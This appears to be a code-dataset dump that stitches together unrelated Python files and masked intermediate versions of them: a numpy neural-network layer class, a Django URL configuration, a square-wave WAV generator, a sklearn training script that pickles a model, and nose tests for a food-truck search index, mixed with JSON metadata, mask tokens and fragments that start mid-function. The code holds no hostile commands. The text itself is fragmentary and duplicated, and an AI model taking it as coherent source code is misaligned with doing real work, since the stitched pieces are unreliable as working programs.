self.pre_activation = self.weights.dot(self.activation) + self.bias
def forward(self, activation):
self.activation = activation
self.__forward_linear()
self.activation_layer = self.activation_func.forward(self.
pre_activation)
return self.activation_layer
def __backward_linear(self, d_pre_activation):
m = self.activation.shape[1]
self.d_weights = 1.0 / m * np.dot(d_pre_activation, self.activation.T)
self.d_bias = 1.0 / m * np.sum(d_pre_activation, axis=1, keepdims=True)
self.d_activation = np.dot(self.weights.T, d_pre_activation)
def backward(self, dA):
dZ = self.activation_func.backward(self.pre_activation, dA)
self.__backward_linear(dZ)
return self.d_activation
def get_parameters_slope(self):
return self.d_weights, self.d_bias
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return self.weights is None or self.bias is None
def __init_parameters(self, size_of_previous_layer):
self.weights = np.random.randn(self.current_layer_dim,
size_of_previous_layer) * np.sqrt(2.0 / size_of_previous_layer)
self.bias = np.zeros((self.current_layer_dim, 1))
def __forward_linear(self):
if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
self.pre_activation = self.weights.dot(self.activation) + self.bias
def forward(self, activation):
self.activation = activation
self.__forward_linear()
self.activation_layer = self.activation_func.forward(self.
pre_activation)
return self.activation_layer
def __backward_linear(self, d_pre_activation):
m = self.activation.shape[1]
self.d_weights = 1.0 / m * np.dot(d_pre_activation, self.activation.T)
self.d_bias = 1.0 / m * np.sum(d_pre_activation, axis=1, keepdims=True)
self.d_activation = np.dot(self.weights.T, d_pre_activation)
def backward(self, dA):
dZ = self.activation_func.backward(self.pre_activation, dA)
self.__backward_linear(dZ)
return self.d_activation
def get_parameters_slope(self):
return self.d_weights, self.d_bias
def update_parameters(self, delta_weights, delta_bias):
self.weights -= delta_weights
self.bias -= delta_bias
<|reserved_special_token_1|>
import numpy as np
class LayerBase(object):
def __init__(self, units_count, activation_func):
self.current_layer_dim = units_count
self.activation_func = activation_func
self.weights = None
self.bias = None
self.pre_activation = None
self.activation_layer = None
self.activation = None
self.d_weights = None
self.d_bias = None
self.d_activation = None
def __if_params_not_initialized(self):
return (self.weights is None) or (self.bias is None)
def __init_parameters(self, size_of_previous_layer):
self.weights = np.random.randn(self.current_layer_dim, size_of_previous_layer) \
* np.sqrt(2. / size_of_previous_layer)
self.bias = np.zeros((self.current_layer_dim, 1))
def __forward_linear(self):
if self.__if_params_not_initialized():
self.__init_parameters(self.activation.shape[0])
self.pre_activation = self.weights.dot(self.activation) + self.bias
def forward(self, activation):
self.activation = activation
self.__forward_linear()
self.activation_layer = self.activation_func.forward(self.pre_activation)
return self.activation_layer
def __backward_linear(self, d_pre_activation):
m = self.activation.shape[1]
self.d_weights = 1. / m * np.dot(d_pre_activation, self.activation.T)
self.d_bias = 1. / m * np.sum(d_pre_activation, axis=1, keepdims=True)
self.d_activation = np.dot(self.weights.T, d_pre_activation)
def backward(self, dA):
dZ = self.activation_func.backward(self.pre_activation, dA)
self.__backward_linear(dZ)
return self.d_activation
def get_parameters_slope(self):
return self.d_weights, self.d_bias
def update_parameters(self, delta_weights, delta_bias):
self.weights -= delta_weights
self.bias -= delta_bias
|
flexible
|
{
"blob_id": "389ccddcbe2214ae5c012bc82a404a81942792d8",
"index": 1770,
"step-1": "<mask token>\n\n\nclass LayerBase(object):\n\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return self.weights is None or self.bias is None\n <mask token>\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass LayerBase(object):\n\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return self.weights is None or self.bias is None\n <mask token>\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n\n def forward(self, activation):\n self.activation = activation\n self.__forward_linear()\n self.activation_layer = self.activation_func.forward(self.\n pre_activation)\n return self.activation_layer\n <mask token>\n\n def backward(self, dA):\n dZ = self.activation_func.backward(self.pre_activation, dA)\n self.__backward_linear(dZ)\n return self.d_activation\n\n def get_parameters_slope(self):\n return self.d_weights, self.d_bias\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LayerBase(object):\n\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return self.weights is None or self.bias is None\n\n def __init_parameters(self, size_of_previous_layer):\n self.weights = np.random.randn(self.current_layer_dim,\n size_of_previous_layer) * np.sqrt(2.0 / size_of_previous_layer)\n self.bias = np.zeros((self.current_layer_dim, 1))\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n\n def forward(self, activation):\n self.activation = activation\n self.__forward_linear()\n self.activation_layer = self.activation_func.forward(self.\n pre_activation)\n return self.activation_layer\n\n def __backward_linear(self, d_pre_activation):\n m = self.activation.shape[1]\n self.d_weights = 1.0 / m * np.dot(d_pre_activation, self.activation.T)\n self.d_bias = 1.0 / m * np.sum(d_pre_activation, axis=1, keepdims=True)\n self.d_activation = np.dot(self.weights.T, d_pre_activation)\n\n def backward(self, dA):\n dZ = self.activation_func.backward(self.pre_activation, dA)\n self.__backward_linear(dZ)\n return self.d_activation\n\n def get_parameters_slope(self):\n return self.d_weights, self.d_bias\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass LayerBase(object):\n\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return self.weights is None or self.bias is None\n\n def __init_parameters(self, size_of_previous_layer):\n self.weights = np.random.randn(self.current_layer_dim,\n size_of_previous_layer) * np.sqrt(2.0 / size_of_previous_layer)\n self.bias = np.zeros((self.current_layer_dim, 1))\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n\n def forward(self, activation):\n self.activation = activation\n self.__forward_linear()\n self.activation_layer = self.activation_func.forward(self.\n pre_activation)\n return self.activation_layer\n\n def __backward_linear(self, d_pre_activation):\n m = self.activation.shape[1]\n self.d_weights = 1.0 / m * np.dot(d_pre_activation, self.activation.T)\n self.d_bias = 1.0 / m * np.sum(d_pre_activation, axis=1, keepdims=True)\n self.d_activation = np.dot(self.weights.T, d_pre_activation)\n\n def backward(self, dA):\n dZ = self.activation_func.backward(self.pre_activation, dA)\n self.__backward_linear(dZ)\n return self.d_activation\n\n def get_parameters_slope(self):\n return self.d_weights, self.d_bias\n\n def update_parameters(self, delta_weights, delta_bias):\n self.weights -= delta_weights\n self.bias -= delta_bias\n",
"step-5": "import numpy as np\n\n\nclass LayerBase(object):\n def __init__(self, units_count, activation_func):\n self.current_layer_dim = units_count\n self.activation_func = activation_func\n\n self.weights = None\n self.bias = None\n self.pre_activation = None\n self.activation_layer = None\n self.activation = None\n self.d_weights = None\n self.d_bias = None\n self.d_activation = None\n\n def __if_params_not_initialized(self):\n return (self.weights is None) or (self.bias is None)\n\n def __init_parameters(self, size_of_previous_layer):\n self.weights = np.random.randn(self.current_layer_dim, size_of_previous_layer) \\\n * np.sqrt(2. / size_of_previous_layer)\n self.bias = np.zeros((self.current_layer_dim, 1))\n\n def __forward_linear(self):\n if self.__if_params_not_initialized():\n self.__init_parameters(self.activation.shape[0])\n\n self.pre_activation = self.weights.dot(self.activation) + self.bias\n\n def forward(self, activation):\n self.activation = activation\n self.__forward_linear()\n self.activation_layer = self.activation_func.forward(self.pre_activation)\n return self.activation_layer\n\n def __backward_linear(self, d_pre_activation):\n m = self.activation.shape[1]\n\n self.d_weights = 1. / m * np.dot(d_pre_activation, self.activation.T)\n self.d_bias = 1. / m * np.sum(d_pre_activation, axis=1, keepdims=True)\n self.d_activation = np.dot(self.weights.T, d_pre_activation)\n\n def backward(self, dA):\n dZ = self.activation_func.backward(self.pre_activation, dA)\n self.__backward_linear(dZ)\n return self.d_activation\n\n def get_parameters_slope(self):\n return self.d_weights, self.d_bias\n\n def update_parameters(self, delta_weights, delta_bias):\n self.weights -= delta_weights\n self.bias -= delta_bias\n",
"step-ids": [
4,
7,
9,
10,
12
]
}
|
[
4,
7,
9,
10,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = patterns('commtrack_reports.views', ('^commtrackreports$',
'reports'), ('^sampling_points$', 'sampling_points'), (
'^commtrack_testers$', 'testers'), ('^date_range$', 'date_range'), (
'^create_report$', 'create_report'), ('^export_csv$', 'export_csv'), (
'^export_pdf$', 'pdf_view'))
<|reserved_special_token_1|>
from django.conf.urls.defaults import *
urlpatterns = patterns('commtrack_reports.views', ('^commtrackreports$',
'reports'), ('^sampling_points$', 'sampling_points'), (
'^commtrack_testers$', 'testers'), ('^date_range$', 'date_range'), (
'^create_report$', 'create_report'), ('^export_csv$', 'export_csv'), (
'^export_pdf$', 'pdf_view'))
<|reserved_special_token_1|>
from django.conf.urls.defaults import *
## reports view
urlpatterns = patterns('commtrack_reports.views',
(r'^commtrackreports$', 'reports'),
(r'^sampling_points$', 'sampling_points'),
(r'^commtrack_testers$', 'testers'),
(r'^date_range$', 'date_range'),
(r'^create_report$', 'create_report'),
(r'^export_csv$', 'export_csv'),
(r'^export_pdf$', 'pdf_view'),
# (r'^test$', 'test'),
)
|
flexible
|
{
"blob_id": "6d244b719200ae2a9c1a738e746e8c401f8ba4e2",
"index": 3342,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = patterns('commtrack_reports.views', ('^commtrackreports$',\n 'reports'), ('^sampling_points$', 'sampling_points'), (\n '^commtrack_testers$', 'testers'), ('^date_range$', 'date_range'), (\n '^create_report$', 'create_report'), ('^export_csv$', 'export_csv'), (\n '^export_pdf$', 'pdf_view'))\n",
"step-3": "from django.conf.urls.defaults import *\nurlpatterns = patterns('commtrack_reports.views', ('^commtrackreports$',\n 'reports'), ('^sampling_points$', 'sampling_points'), (\n '^commtrack_testers$', 'testers'), ('^date_range$', 'date_range'), (\n '^create_report$', 'create_report'), ('^export_csv$', 'export_csv'), (\n '^export_pdf$', 'pdf_view'))\n",
"step-4": "from django.conf.urls.defaults import *\n\n## reports view\nurlpatterns = patterns('commtrack_reports.views',\n (r'^commtrackreports$', 'reports'),\n (r'^sampling_points$', 'sampling_points'),\n (r'^commtrack_testers$', 'testers'),\n (r'^date_range$', 'date_range'),\n (r'^create_report$', 'create_report'),\n (r'^export_csv$', 'export_csv'),\n (r'^export_pdf$', 'pdf_view'),\n# (r'^test$', 'test'),\n\n)\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
import struct
import sys
import wave
sys.path.insert(0, os.path.dirname(__file__))
C5 = 523
B4b = 466
G4 = 392
E5 = 659
F5 = 698
VOLUME = 12000
notes = [
[VOLUME, C5],
[VOLUME, C5],
[VOLUME, B4b],
[VOLUME, C5],
[0, C5],
[VOLUME, G4],
[0, C5],
[VOLUME, G4],
[VOLUME, C5],
[VOLUME, F5],
[VOLUME, E5],
[VOLUME, C5],
]
from fade import fade
from gain import gain
from repeat import repeat
from square import square_wave
all_samples = []
quarter_second = 44100 // 4
for volume, frequency in notes:
samples = square_wave(int(44100 / frequency // 2))
samples = gain(samples, volume)
samples = repeat(samples, quarter_second)
samples = fade(samples, quarter_second)
all_samples.extend(samples)
all_samples = [int(sample) for sample in all_samples]
w = wave.open('music.wav', 'wb')
w.setnchannels(1)
w.setsampwidth(2)
w.setframerate(44100)
w.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))
|
normal
|
{
"blob_id": "4fb563985bd99599e88676e167ee84a95b018aba",
"index": 5414,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsys.path.insert(0, os.path.dirname(__file__))\n<mask token>\nfor volume, frequency in notes:\n samples = square_wave(int(44100 / frequency // 2))\n samples = gain(samples, volume)\n samples = repeat(samples, quarter_second)\n samples = fade(samples, quarter_second)\n all_samples.extend(samples)\n<mask token>\nw.setnchannels(1)\nw.setsampwidth(2)\nw.setframerate(44100)\nw.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))\n",
"step-3": "<mask token>\nsys.path.insert(0, os.path.dirname(__file__))\nC5 = 523\nB4b = 466\nG4 = 392\nE5 = 659\nF5 = 698\nVOLUME = 12000\nnotes = [[VOLUME, C5], [VOLUME, C5], [VOLUME, B4b], [VOLUME, C5], [0, C5],\n [VOLUME, G4], [0, C5], [VOLUME, G4], [VOLUME, C5], [VOLUME, F5], [\n VOLUME, E5], [VOLUME, C5]]\n<mask token>\nall_samples = []\nquarter_second = 44100 // 4\nfor volume, frequency in notes:\n samples = square_wave(int(44100 / frequency // 2))\n samples = gain(samples, volume)\n samples = repeat(samples, quarter_second)\n samples = fade(samples, quarter_second)\n all_samples.extend(samples)\nall_samples = [int(sample) for sample in all_samples]\nw = wave.open('music.wav', 'wb')\nw.setnchannels(1)\nw.setsampwidth(2)\nw.setframerate(44100)\nw.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))\n",
"step-4": "import os\nimport struct\nimport sys\nimport wave\nsys.path.insert(0, os.path.dirname(__file__))\nC5 = 523\nB4b = 466\nG4 = 392\nE5 = 659\nF5 = 698\nVOLUME = 12000\nnotes = [[VOLUME, C5], [VOLUME, C5], [VOLUME, B4b], [VOLUME, C5], [0, C5],\n [VOLUME, G4], [0, C5], [VOLUME, G4], [VOLUME, C5], [VOLUME, F5], [\n VOLUME, E5], [VOLUME, C5]]\nfrom fade import fade\nfrom gain import gain\nfrom repeat import repeat\nfrom square import square_wave\nall_samples = []\nquarter_second = 44100 // 4\nfor volume, frequency in notes:\n samples = square_wave(int(44100 / frequency // 2))\n samples = gain(samples, volume)\n samples = repeat(samples, quarter_second)\n samples = fade(samples, quarter_second)\n all_samples.extend(samples)\nall_samples = [int(sample) for sample in all_samples]\nw = wave.open('music.wav', 'wb')\nw.setnchannels(1)\nw.setsampwidth(2)\nw.setframerate(44100)\nw.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))\n",
"step-5": "import os\nimport struct\nimport sys\nimport wave\n\nsys.path.insert(0, os.path.dirname(__file__))\n\nC5 = 523\nB4b = 466\nG4 = 392\nE5 = 659\nF5 = 698\nVOLUME = 12000\n\nnotes = [\n [VOLUME, C5],\n [VOLUME, C5],\n [VOLUME, B4b],\n [VOLUME, C5],\n [0, C5],\n [VOLUME, G4],\n [0, C5],\n [VOLUME, G4],\n [VOLUME, C5],\n [VOLUME, F5],\n [VOLUME, E5],\n [VOLUME, C5],\n]\n\nfrom fade import fade\nfrom gain import gain\nfrom repeat import repeat\nfrom square import square_wave\n\nall_samples = []\nquarter_second = 44100 // 4\nfor volume, frequency in notes:\n samples = square_wave(int(44100 / frequency // 2))\n samples = gain(samples, volume)\n samples = repeat(samples, quarter_second)\n samples = fade(samples, quarter_second)\n all_samples.extend(samples)\n\nall_samples = [int(sample) for sample in all_samples]\n\nw = wave.open('music.wav', 'wb')\nw.setnchannels(1)\nw.setsampwidth(2)\nw.setframerate(44100)\nw.writeframes(struct.pack('<' + 'h' * len(all_samples), *all_samples))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def Run(datasetFile):
userFile = open(datasetFile, 'r')
instanceList = []
instanceCount = 0
featureCount = 0
for instance in userFile:
tempStr = instance
instanceCount += 1
for entry in tempStr.split(','):
instanceList.append(entry)
featureCount += 1
userFile.close()
featureCount = int(featureCount / instanceCount)
dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount
).reshape(instanceCount, featureCount)
for instance in range(instanceCount):
dataFull[instance][featureCount - 1] = dataFull[instance][
featureCount - 1].rstrip('\n')
features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(
featureCount - 1, instanceCount).T
target = np.array(dataFull.T[featureCount - 1]).astype(float)
isClassification = False
for i in range(len(target)):
if int(target[i]) == 0 or int(target[i]) == 1:
isClassification = True
else:
isClassification = False
break
mlModel = None
if isClassification:
mlModel = LogisticRegression().fit(features, target)
else:
mlModel = LinearRegression().fit(features, target)
tmpFileName, file_exe = os.path.splitext(datasetFile)
newFilePath = tmpFileName + 'MODEL' + '.sav'
pickle.dump(mlModel, open(newFilePath, 'wb'))
<|reserved_special_token_1|>
from sklearn.linear_model import LinearRegression, LogisticRegression
import numpy as np
import pickle
import os
def Run(datasetFile):
userFile = open(datasetFile, 'r')
instanceList = []
instanceCount = 0
featureCount = 0
for instance in userFile:
tempStr = instance
instanceCount += 1
for entry in tempStr.split(','):
instanceList.append(entry)
featureCount += 1
userFile.close()
featureCount = int(featureCount / instanceCount)
dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount
).reshape(instanceCount, featureCount)
for instance in range(instanceCount):
dataFull[instance][featureCount - 1] = dataFull[instance][
featureCount - 1].rstrip('\n')
features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(
featureCount - 1, instanceCount).T
target = np.array(dataFull.T[featureCount - 1]).astype(float)
isClassification = False
for i in range(len(target)):
if int(target[i]) == 0 or int(target[i]) == 1:
isClassification = True
else:
isClassification = False
break
mlModel = None
if isClassification:
mlModel = LogisticRegression().fit(features, target)
else:
mlModel = LinearRegression().fit(features, target)
tmpFileName, file_exe = os.path.splitext(datasetFile)
newFilePath = tmpFileName + 'MODEL' + '.sav'
pickle.dump(mlModel, open(newFilePath, 'wb'))
<|reserved_special_token_1|>
from sklearn.linear_model import LinearRegression, LogisticRegression
import numpy as np
import pickle
import os
def Run(datasetFile):
# Get file from user
userFile = open(datasetFile, "r")
# Starter list of all instances of the data file
instanceList = []
instanceCount = 0
featureCount = 0
# put all instances in data file line by line into instanceList[]
for instance in userFile:
tempStr = instance
instanceCount += 1
# Be sure to seperate the entries by commas
for entry in tempStr.split(','):
instanceList.append(entry)
featureCount += 1
# Close file
userFile.close()
# Adjust size of feature count
featureCount = int(featureCount / instanceCount)
# With data now seperated we can make the numpy array and transpose it
dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount).reshape(instanceCount, featureCount)
# Get rid of all the '\n' in array
for instance in range(instanceCount):
dataFull[instance][featureCount-1] = dataFull[instance][featureCount-1].rstrip("\n")
features = np.array(dataFull.T[0:featureCount-1]).astype(float).reshape(featureCount-1, instanceCount).T
target = np.array(dataFull.T[featureCount-1]).astype(float)
# Setup Machine Learning
isClassification = False
for i in range(len(target)):
if int(target[i]) == 0 or int(target[i]) == 1:
isClassification = True
else:
isClassification = False
break
mlModel = None
if isClassification:
mlModel = LogisticRegression().fit(features, target)
else:
mlModel = LinearRegression().fit(features, target)
# Make new file for Model data
tmpFileName, file_exe = os.path.splitext(datasetFile)
newFilePath = tmpFileName + "MODEL" + ".sav"
pickle.dump(mlModel, open(newFilePath, 'wb'))
|
flexible
|
{
"blob_id": "ee7efea569b685ad8d6922e403421227e9ea6922",
"index": 6277,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Run(datasetFile):\n userFile = open(datasetFile, 'r')\n instanceList = []\n instanceCount = 0\n featureCount = 0\n for instance in userFile:\n tempStr = instance\n instanceCount += 1\n for entry in tempStr.split(','):\n instanceList.append(entry)\n featureCount += 1\n userFile.close()\n featureCount = int(featureCount / instanceCount)\n dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount\n ).reshape(instanceCount, featureCount)\n for instance in range(instanceCount):\n dataFull[instance][featureCount - 1] = dataFull[instance][\n featureCount - 1].rstrip('\\n')\n features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(\n featureCount - 1, instanceCount).T\n target = np.array(dataFull.T[featureCount - 1]).astype(float)\n isClassification = False\n for i in range(len(target)):\n if int(target[i]) == 0 or int(target[i]) == 1:\n isClassification = True\n else:\n isClassification = False\n break\n mlModel = None\n if isClassification:\n mlModel = LogisticRegression().fit(features, target)\n else:\n mlModel = LinearRegression().fit(features, target)\n tmpFileName, file_exe = os.path.splitext(datasetFile)\n newFilePath = tmpFileName + 'MODEL' + '.sav'\n pickle.dump(mlModel, open(newFilePath, 'wb'))\n",
"step-3": "from sklearn.linear_model import LinearRegression, LogisticRegression\nimport numpy as np\nimport pickle\nimport os\n\n\ndef Run(datasetFile):\n userFile = open(datasetFile, 'r')\n instanceList = []\n instanceCount = 0\n featureCount = 0\n for instance in userFile:\n tempStr = instance\n instanceCount += 1\n for entry in tempStr.split(','):\n instanceList.append(entry)\n featureCount += 1\n userFile.close()\n featureCount = int(featureCount / instanceCount)\n dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount\n ).reshape(instanceCount, featureCount)\n for instance in range(instanceCount):\n dataFull[instance][featureCount - 1] = dataFull[instance][\n featureCount - 1].rstrip('\\n')\n features = np.array(dataFull.T[0:featureCount - 1]).astype(float).reshape(\n featureCount - 1, instanceCount).T\n target = np.array(dataFull.T[featureCount - 1]).astype(float)\n isClassification = False\n for i in range(len(target)):\n if int(target[i]) == 0 or int(target[i]) == 1:\n isClassification = True\n else:\n isClassification = False\n break\n mlModel = None\n if isClassification:\n mlModel = LogisticRegression().fit(features, target)\n else:\n mlModel = LinearRegression().fit(features, target)\n tmpFileName, file_exe = os.path.splitext(datasetFile)\n newFilePath = tmpFileName + 'MODEL' + '.sav'\n pickle.dump(mlModel, open(newFilePath, 'wb'))\n",
"step-4": "from sklearn.linear_model import LinearRegression, LogisticRegression\nimport numpy as np\nimport pickle\nimport os\n\ndef Run(datasetFile):\n \n # Get file from user\n userFile = open(datasetFile, \"r\")\n \n # Starter list of all instances of the data file\n instanceList = []\n instanceCount = 0\n featureCount = 0 \n \n # put all instances in data file line by line into instanceList[] \n for instance in userFile:\n tempStr = instance\n instanceCount += 1\n \n # Be sure to seperate the entries by commas\n for entry in tempStr.split(','):\n instanceList.append(entry)\n featureCount += 1\n \n # Close file\n userFile.close()\n \n # Adjust size of feature count\n featureCount = int(featureCount / instanceCount)\n \n # With data now seperated we can make the numpy array and transpose it \n dataFull = np.asarray(instanceList).reshape(instanceCount * featureCount).reshape(instanceCount, featureCount)\n \n # Get rid of all the '\\n' in array\n for instance in range(instanceCount):\n dataFull[instance][featureCount-1] = dataFull[instance][featureCount-1].rstrip(\"\\n\")\n \n features = np.array(dataFull.T[0:featureCount-1]).astype(float).reshape(featureCount-1, instanceCount).T\n target = np.array(dataFull.T[featureCount-1]).astype(float)\n \n # Setup Machine Learning\n isClassification = False\n for i in range(len(target)):\n if int(target[i]) == 0 or int(target[i]) == 1:\n isClassification = True\n else:\n isClassification = False\n break\n \n mlModel = None\n \n if isClassification:\n mlModel = LogisticRegression().fit(features, target)\n else:\n mlModel = LinearRegression().fit(features, target) \n\n \n # Make new file for Model data\n tmpFileName, file_exe = os.path.splitext(datasetFile)\n newFilePath = tmpFileName + \"MODEL\" + \".sav\"\n pickle.dump(mlModel, open(newFilePath, 'wb'))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Copyright (C) 2014 Abhay Vardhan. All Rights Reserved.
"""
Author: abhay.vardhan@gmail.com
We have not yet added tests which exercise the HTTP GET directly.
"""
__author__ = 'abhay'
from nose.tools import *
import test_data
import search_index
class TestClass:
def setUp(self):
search_index.buildIndex(test_data.sample_food_trucks_data)
def tearDown(self):
pass
def test_case_query_index(self):
assert_equals(search_index.query_index, test_data.sample_query_index)
def test_case_lat_index(self):
assert_equals(search_index.sorted_latitudes, test_data.sample_latitude_index)
def test_case_lng_index(self):
assert_equals(search_index.sorted_longitudes, test_data.sample_longitude_index)
def test_case_search_query(self):
assert_equals(search_index.searchQuery('cold'), set([2, 3]))
def test_case_search_query_case(self):
assert_equals(search_index.searchQuery('Cold'), set([2, 3]))
def test_case_search_find_le(self):
assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)
assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)
assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)
def test_case_search_find_ge(self):
assert_equals(search_index.find_ge([10, 20, 30, 40], 20), 1)
assert_equals(search_index.find_ge([10, 20, 30, 40], 30), 2)
assert_equals(search_index.find_ge([10, 20, 30, 40], 20.1), 2)
def test_case_search_lat(self):
assert_equals(search_index.find_array_range_matching([10, 20, 30, 40], 20, 30), set([1, 2]))
assert_equals(search_index.find_array_range_matching([10, 20, 30, 40], 19, 35), set([1, 2]))
assert_equals(search_index.find_array_range_matching([10, 20, 30, 40], 9, 50), set([0, 1, 2, 3]))
def test_case_search1(self):
all_objectids = [x['objectid'] for x in search_index.all_results]
results = search_index.search('', 37.7860914634251, -122.398658184604, 37.7901490737255, -122.3934729318)
assert_equals([x['objectid'] for x in results],
all_objectids)
def test_case_search2(self):
all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]
results = search_index.search('', 37.7879000978181, -122.398658184604, 37.7901490737255, -122.394594036205)
assert_equals([x['objectid'] for x in results],
all_objectids)
def test_case_search3(self):
all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]
results = search_index.search('', 37.787, -122.398658184604, 37.7901490737255, -122.394)
assert_equals([x['objectid'] for x in results],
all_objectids)
def test_case_search4(self):
all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]
results = search_index.search('cold', 37.7860914634251, -122.398658184604, 37.7901490737255, -122.3934729318)
assert_equals([x['objectid'] for x in results],
all_objectids)
def test_case_search5(self):
all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]
results = search_index.search('cheese', 37.7860914634251, -122.398658184604, 37.7901490737255, -122.3934729318)
assert_equals([x['objectid'] for x in results],
all_objectids)
|
normal
|
{
"blob_id": "a9c0251b3422457b2c0089b70308a70b09cfa0e0",
"index": 7276,
"step-1": "<mask token>\n\n\nclass TestClass:\n\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n <mask token>\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.\n sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = search_index.search('', 37.787, -122.398658184604, \n 37.7901490737255, -122.394)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search4(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[2:4]]\n results = search_index.search('cold', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n\n def test_case_search5(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[1:2]]\n results = search_index.search('cheese', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n",
"step-2": "<mask token>\n\n\nclass TestClass:\n\n def setUp(self):\n search_index.buildIndex(test_data.sample_food_trucks_data)\n\n def tearDown(self):\n pass\n\n def test_case_query_index(self):\n assert_equals(search_index.query_index, test_data.sample_query_index)\n\n def test_case_lat_index(self):\n assert_equals(search_index.sorted_latitudes, test_data.\n sample_latitude_index)\n\n def test_case_lng_index(self):\n assert_equals(search_index.sorted_longitudes, test_data.\n sample_longitude_index)\n\n def test_case_search_query(self):\n assert_equals(search_index.searchQuery('cold'), set([2, 3]))\n\n def test_case_search_query_case(self):\n assert_equals(search_index.searchQuery('Cold'), set([2, 3]))\n\n def test_case_search_find_le(self):\n assert_equals(search_index.find_le([10, 20, 30, 40], 20), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 20.1), 1)\n assert_equals(search_index.find_le([10, 20, 30, 40], 30), 2)\n <mask token>\n <mask token>\n\n def test_case_search1(self):\n all_objectids = [x['objectid'] for x in search_index.all_results]\n results = search_index.search('', 37.7860914634251, -\n 122.398658184604, 37.7901490737255, -122.3934729318)\n assert_equals([x['objectid'] for x in results], all_objectids)\n <mask token>\n\n def test_case_search3(self):\n all_objectids = [x['objectid'] for x in search_index.all_results[0:3]]\n results = 